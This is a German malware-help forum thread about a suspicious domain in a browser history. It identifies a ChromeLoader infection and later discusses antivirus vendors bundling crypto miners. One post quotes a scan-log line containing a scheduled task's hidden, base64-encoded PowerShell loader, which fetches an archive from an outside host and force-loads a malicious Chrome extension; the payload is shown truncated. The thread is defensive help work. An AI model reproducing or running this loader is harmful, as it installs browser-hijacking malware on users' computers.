https://www.trojaner-board.de/203241...ml#post1760771

Zitat:

Ich wende mich an euch, weil ich beim PC meiner Eltern, einen komischen Chronik Verlauf gefunden habe.
Ständig ist die Internetseite exsalut.com enthalten. Google liefert keine brauchbaren Ergebnisse und wenn man der Seite in der Chronik folgt, kommt man ins leere.

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com

Zitat:

Registrar URL: http://registrar.amazon.com
Updated Date: 2020-05-18T12:48:18Z
Creation Date: 2020-05-18T12:37:17Z
Registry Expiry Date: 2021-05-18T12:37:17Z

Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Zitat:

Zitat von webwatcher

https://www.trojaner-board.de/203241...ml#post1760771

taucht schon früher im Board und im WWW auf

exsalut.com ist auf amazon registriert
https://stuffgate.com/exsalut.com


Wozu die dient, ist unklar. Hab jedenfalls keinen Hinweis/Erklärung dazu gefunden.
Aufruf liefert eine leere Seite.

Analog zu hier.

Neue Malware (hab ich auch schon bei MB gesehen).

Link zum Thema

Zitat:

Task: {FF650B09-2BA7-407F-AD46-F0DDA995556C} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACIAbgBhAG0AZQA9ACcAYwBoAHIAbwBtAGUALgBlAHgAZQAnACIAKQAg AHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsACgAJAGkAZgAoACQAXwAgAC0ATQ BhAHQAYwBoACAAIgBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4AIgApAHsACgAJAAkAYgByAGUAYQBrADsACgAJAH0ACgAKAAkAJABpAHMATwBwAGUAbgAgAD0AIAAxADsACgB9AAoACgBpAGYA KAAkAGkAcwBPAHAAZQBuACkAewAKAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAeAB0AFAAYQB0AGgAKQApAHsACgAKAAkACQAkAGEAcgBjAG gAaQB2AGUATgBhAG0AZQAgAD0AIAAiACQAKAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAKQBcAGEAcgBjAGgAaQB2AGUALgB6AGkAcAAiAAoACgAJAAkAdAByAHkAewAKAAkACQAJ AHcAZwBlAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBiAHIAbwBrAGUAbgBuAGEALgB3AG8AcgBrAC8AYQByAGMAaABpAHYAZQAuAHoAaQBwACIAIAAtAG8AdQB0AGYAaQBsAGUAIAAiACQAYQByAGMAaA BpAHYAZQBOAGEAbQBlACIACgAJAAkAfQBjAGEAdABjAGgAewAKAAkACQAJAGIAcgBlAGEAawAKAAkACQB9AAoACgAJAAkARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBMAGkAdABlAHIA YQBsAFAAYQB0AGgAIAAiACQAYQByAGMAaABpAHYAZQBOAGEAbQBlACIAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgBQAGEAdABoACAAIgAkAGUAeAB0AFAAYQB0AGgAIgAKAAoACQB9AAoACgAJAH QAcgB5AHsACgAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAYwBoAHIAbwBtAGUAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAEMAbABvAHMAZQBNAGEAaQBu AFcAaQBuAGQAbwB3ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAfQAKAAkACQBzAHQAYQByAHQAIABjAGgAcgBvAG0AZQAgAC0ALQBsAG8AYQBkAC0AZQB4AHQAZQBuAHMAaQBvAG4APQAiACQAZQ B4AHQAUABhAHQAaAAiACwAIAAtAC0AcgBlAHMAdABvAHIAZQAtAGwAYQBzAHQALQBzAGUAcwBzAGkAbwBuACwAIAAtAC0AbgBvAGUAcgByAGQAaQBhAGwAbwBnAHMALAAgAC0ALQBkAGkAcwBhAGIA bABlAC0AcwBlAHMAcwBpAG8AbgAtAGMAcgBhAHMAaABlAGQALQBiAHUAYgBiAGwAZQAKAAkAfQBjAGEAdABjAGgAewB9AAoACgB9AAoACgA= /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAaQBzAE8AcABlAG4AIAA9ACAAMAA7AAoACgAoAE cAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAL (Der Dateneintrag hat 1683 mehr Zeichen). (Keine Datei) <==== ACHTUNG

CHR Extension: (Settings) - C:\Users\tilmu\AppData\Local [2022-01-05]

C:\Users\tilmu\AppData\Local\chrome

Zitat:

========================= Folder: C:\Users\tilmu\AppData\Local\chrome ========================

2022-01-04 10:51 - 2022-01-04 09:51 - 000010714 ____A [8FD91B4289AF2CAA8006118AA082F7B7] () C:\Users\tilmu\AppData\Local\chrome\background.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000221 ____A [1B92868D55E896DA6D17BFB900DE92CF] () C:\Users\tilmu\AppData\Local\chrome\conf.js
2022-01-04 10:51 - 2022-01-04 09:51 - 000000484 ____A [A71C82A6FFE68495546E7BB7D3F62A0C] () C:\Users\tilmu\AppData\Local\chrome\manifest.json
2022-01-04 10:51 - 2022-01-04 09:51 - 000003970 ____A [4E46AD8737DD28215F3C478EE8B01DC0] () C:\Users\tilmu\AppData\Local\chrome\settings.png

Third party AV ist bekannt als überflüssiges/contraproduktives Schlangenöl. Ein neues Highlight:

https://www.borncity.com/blog/2022/0...-krypto-miner/

Zitat:

[English]Heute noch ein kleiner Beitrag "aus der Gruft", der zeigt, was man sich heutzutage alles mit Software bei der Installation auf die Systeme holen kann. So manches Software-Paket kommt ja auf viele Mega- oder Gigabyte Download-Größe und man fragt sich, was da alles dabei und zur Installation erforderlich ist. Den Vogel schießt die Sicherheits- und Antivirus-Lösung Norton 360 ab, die so ganz nebenbei einen Krypto-Miner auf dem System des Anwenders installiert. Das kann zwar durch den Anwender gesteuert werden, ist aber trotzdem bedenklich. Ich bin zufällig die Tage auf Twitter auf diesen Fall aufmerksam geworden, weil auf die entsprechende FAQ in der Norton-Community hinwiesen wurde.

https://twitter.com/doctorow/status/1478479483585933312

Zitat:

This is fucking wild. Norton "Antivirus" now sneakily installs cryptomining software on your computer, and then SKIMS A COMMISSION.

Zitat:

Zitat von Google Übersetzer

Das ist verdammt wild. Norton "Antivirus" installiert jetzt heimlich Cryptomining-Software auf Ihrem Computer und kassiert dann EINE KOMMISSION.

Wie gestört ist das denn...

Bin gespannt, ob noch andere AV-Hersteller auf diesen Zug aufspringen...

Hier wird das auch erwähnt: https://www.borncity.com/blog/2022/01/06/krass-norton-360-installiert-krypto-miner/#more-261223

Ach was, schon mal mein obiges Posting von Anfang an gelesen?

https://www.heise.de/news/Norton-Cry...e-6061292.html

Zitat:

Zitat von M-K-D-B

Wie gestört ist das denn...

Bin gespannt, ob noch andere AV-Hersteller auf diesen Zug aufspringen...

Hat ja nicht lange gedauert und natürlich ist es....TATAAA....AVIRA !

Zitat:

Zitat von cosinus

Hat ja nicht lange gedauert und natürlich ist es....TATAAA....AVIRA !

Avira/Avast/AVG/Norton ist ja alles ein Verein...
Kannst also davon ausgehen, dass die anderen das auch noch "spendiert" bekommen.

Oder gehört da noch was dazu?


Und das wirklich Schlimme ist ja, dass es sehr viele naive Menschen gibt, die wirklich daran glauben, dass die damit reales Geld erwirtschaften können, so dass man davon leben kann.